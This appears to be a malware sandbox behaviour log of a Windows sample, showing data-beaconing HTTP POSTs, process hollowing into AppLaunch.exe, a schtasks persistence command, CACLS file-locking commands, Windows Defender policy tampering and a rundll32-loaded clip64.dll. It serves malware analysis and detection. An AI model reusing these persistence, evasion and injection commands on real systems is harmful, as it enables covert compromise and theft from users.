post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0

HttpSendRequestA

headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.66&sd=c7de6f&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1
1 1 0
Process injection Process 2984 resumed a thread in remote process 3044
Process injection Process 2732 resumed a thread in remote process 2976
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000020
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

thread_handle: 0x0000027c
suspend_count: 1
process_identifier: 2976
1 0 0
cmdline cmd /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit
cmdline CACLS "nbveek.exe" /P "test22:R" /E
cmdline CACLS "mnolyk.exe" /P "test22:N"
cmdline CACLS "..\4f9dd6f8a7" /P "test22:N"
cmdline CACLS "..\9e0894bcc4" /P "test22:N"
cmdline CACLS "..\9e0894bcc4" /P "test22:R" /E
cmdline CACLS "nbveek.exe" /P "test22:N"
cmdline CACLS "..\4f9dd6f8a7" /P "test22:R" /E
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit
cmdline CACLS "mnolyk.exe" /P "test22:R" /E
cmdline cmd /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2052
thread_handle: 0x0000001c
process_identifier: 2032
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\sLP46se.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000128
1 1 0

CreateProcessInternalW

thread_identifier: 2124
thread_handle: 0x00000128
process_identifier: 2120
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\rtJ58hE.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

thread_identifier: 2096
thread_handle: 0x0000001c
process_identifier: 2092
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\slV42BL.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000128
1 1 0

CreateProcessInternalW

thread_identifier: 2988
thread_handle: 0x00000128
process_identifier: 2984
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\nJM68XE.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

thread_identifier: 2180
thread_handle: 0x0000001c
process_identifier: 2176
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\sCf07ZB.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000128
1 1 0

CreateProcessInternalW

thread_identifier: 2732
thread_handle: 0x00000128
process_identifier: 2728
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\leW63TH.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

thread_identifier: 2232
thread_handle: 0x0000001c
process_identifier: 2228
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\iWr34lU.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000128
1 1 0

CreateProcessInternalW

thread_identifier: 2688
thread_handle: 0x00000128
process_identifier: 2684
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\kQu23BE.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

NtResumeThread

thread_handle: 0x000000000000012c
suspend_count: 1
process_identifier: 2228
1 0 0

NtResumeThread

thread_handle: 0x00000000000001a0
suspend_count: 1
process_identifier: 2228
1 0 0

NtResumeThread

thread_handle: 0x00000000000001e4
suspend_count: 1
process_identifier: 2228
1 0 0

NtResumeThread

thread_handle: 0x00000188
suspend_count: 1
process_identifier: 2728
1 0 0

NtResumeThread

thread_handle: 0x000001fc
suspend_count: 1
process_identifier: 2728
1 0 0

NtResumeThread

thread_handle: 0x00000244
suspend_count: 1
process_identifier: 2728
1 0 0

NtResumeThread

thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2728
1 0 0

NtGetContextThread

thread_handle: 0x0000018c
1 0 0

NtGetContextThread

thread_handle: 0x0000018c
1 0 0

NtResumeThread

thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2728
1 0 0

CreateProcessInternalW

thread_identifier: 3048
thread_handle: 0x00000020
process_identifier: 3044
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x0000002c
1 1 0

NtGetContextThread

thread_handle: 0x00000020
1 0 0

NtAllocateVirtualMemory

process_identifier: 3044
region_size: 204800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000002c
1 0 0

WriteProcessMemory

buffer:
base_address: 0x00400000
process_identifier: 3044
process_handle: 0x0000002c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 3044
process_handle: 0x0000002c
1 1 0

NtSetContextThread

registers.eip: 2005598660
registers.esp: 1834392
registers.edi: 0
registers.eax: 4306318
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000020
process_identifier: 3044
1 0 0

NtResumeThread

thread_handle: 0x00000020
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

thread_handle: 0x00000188
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

thread_handle: 0x000001fc
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

thread_handle: 0x00000228
suspend_count: 1
process_identifier: 3044
1 0 0

NtResumeThread

thread_handle: 0x00000394
suspend_count: 1
process_identifier: 3044
1 0 0

NtGetContextThread

thread_handle: 0x0000018c
1 0 0

NtGetContextThread

thread_handle: 0x0000018c
1 0 0

NtResumeThread

thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 3044
1 0 0

CreateProcessInternalW

thread_identifier: 2260
thread_handle: 0x000002b4
process_identifier: 2256
current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP
filepath: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002bc
1 1 0

NtResumeThread

thread_handle: 0x0000027c
suspend_count: 1
process_identifier: 2256
1 0 0

CreateProcessInternalW

thread_identifier: 1156
thread_handle: 0x000002a0
process_identifier: 296
current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP
filepath: C:\Windows\System32\schtasks.exe
track: 1
command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
filepath_r: C:\Windows\System32\schtasks.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002a8
1 1 0

CreateProcessInternalW

thread_identifier: 2608
thread_handle: 0x00000228
process_identifier: 2596
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000294
1 1 0

CreateProcessInternalW

thread_identifier: 3040
thread_handle: 0x000003f4
process_identifier: 3020
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000420
1 1 0

CreateProcessInternalW

thread_identifier: 2648
thread_handle: 0x00000408
process_identifier: 2664
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000042c
1 1 0

CreateProcessInternalW

thread_identifier: 3692
thread_handle: 0x00000440
process_identifier: 3688
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\rundll32.exe
track: 1
command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
filepath_r: C:\Windows\System32\rundll32.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000458
1 1 0

CreateProcessInternalW

thread_identifier: 2180
thread_handle: 0x00000140
process_identifier: 2224
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000148
1 1 0

CreateProcessInternalW

thread_identifier: 1692
thread_handle: 0x0000013c
process_identifier: 524
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "mnolyk.exe" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000140
1 1 0

CreateProcessInternalW

thread_identifier: 2660
thread_handle: 0x00000140
process_identifier: 2672
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "mnolyk.exe" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000148
1 1 0

CreateProcessInternalW

thread_identifier: 2356
thread_handle: 0x00000140
process_identifier: 2852
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000144
1 1 0

CreateProcessInternalW

thread_identifier: 2912
thread_handle: 0x00000148
process_identifier: 2924
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\4f9dd6f8a7" /P "test22:N"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000140
1 1 0

CreateProcessInternalW

thread_identifier: 2976
thread_handle: 0x00000140
process_identifier: 2972
current_directory: C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: CACLS "..\4f9dd6f8a7" /P "test22:R" /E
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000144
1 1 0

NtResumeThread

thread_handle: 0x0000016c
suspend_count: 1
process_identifier: 524
1 0 0

NtResumeThread

thread_handle: 0x00000168
suspend_count: 1
process_identifier: 2672
1 0 0

NtResumeThread

thread_handle: 0x0000016c
suspend_count: 1
process_identifier: 2924
1 0 0

NtResumeThread

thread_handle: 0x00000164
suspend_count: 1
process_identifier: 2972
1 0 0

CreateProcessInternalW

thread_identifier: 2312
thread_handle: 0x0000001c
process_identifier: 508
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nXi14fa28.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000128
1 1 0